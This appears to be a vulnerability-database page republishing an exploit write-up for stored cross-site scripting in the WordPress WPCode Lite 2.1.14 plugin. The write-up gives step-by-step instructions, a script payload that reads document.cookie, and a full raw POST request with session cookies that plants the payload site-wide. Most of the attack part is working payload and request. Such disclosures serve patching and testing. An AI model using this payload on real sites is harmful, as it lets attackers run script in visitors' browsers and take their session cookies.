Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormTmrswrrPACKETSTORM:179279
HistoryJul 01, 2024 - 12:00 a.m.

WordPress WPCode Lite 2.1.14 Cross Site Scripting

2024-07-0100:00:00
tmrswrr
packetstormsecurity.com
26

7.4 High

AI Score

Confidence

Low

JSON
`# Exploit Title: Wordpress WPCode Lite Version 2.1.14 Stored XSS  
# Date: 2024-06-30  
# Exploit Author: tmrswrr  
# Category : Webapps  
# Vendor Homepage: https://wpcode.com/?utm_source=wprepo&utm_medium=link&utm_campaign=liteplugin  
# Version 2.1.14  
  
  
### Steps to Execute the Payload:  
  
1. **Access the Admin Panel:**  
- Navigate to the admin panel of your WordPress site.  
- Go to `Code Snippets > `Edit Snippet` via the following URL:   
```  
https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10  
```  
  
2. **Insert the Payload:**  
- In the **Code Preview** section, insert the following payload:  
```  
"><img src=x onerrora=confirm() onerror=confirm(document.cookie)>  
```  
  
3. **Save and Verify:**  
- Active , Save the changes.  
- Navigate to the main page of your site:  
```  
https://127.0.0.1/  
```  
- You should see the payload executed.  
  
Post Request :  
  
POST /wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10 HTTP/2  
Host: 127.0.0.1  
Cookie: wordpress_sec_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C37619eff632d24400e28a219976a87efa83c4bae1ebe04120e54cb37dbe30a03; wordpress_logged_in_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C49992c3be16529995b5429fdd992a2dc1ff8cafa77c6f72580d9dbf9f3fe82ca; wp-settings-time-1=1719753966; WP-TSW-Session=5lursai747c2vcd5uno86liv2c; wp-settings-1=editor%3Dhtml  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 673  
Origin: https://vagabondcreature.s3-tastewp.com  
Dnt: 1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Te: trailers  
  
wpcode_active=&button=publish&wpcode_snippet_title=Untitled+Snippet&wpcode_snippet_type=html&wpcode_snippet_code=%22%3E%3Cimg+src%3Dx+onerrora%3Dconfirm%28%29+onerror%3Dconfirm%28document.cookie%29%3E&wpcode_snippet_text=%3Cp%3E%22%26gt%3B%3Cimg+src%3D%22x%22+%2F%3E%3C%2Fp%3E&wpcode_auto_insert=1&wpcode_auto_insert_location_extra=&wpcode_auto_insert_number=1&wpcode_auto_insert_location=site_wide_header&wpcode-schedule-start=&wpcode-schedule-end=&wpcode_cl_rules=%5B%5D&wpcode_tags=&wpcode_priority=10&wpcode_note=&id=10&wpcode-save-snippet-nonce=73d127c1c2&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwpcode-snippet-manager%26snippet_id%3D10%26message%3D1%26error  
  
  
  
`

7.4 High

AI Score

Confidence

Low

JSON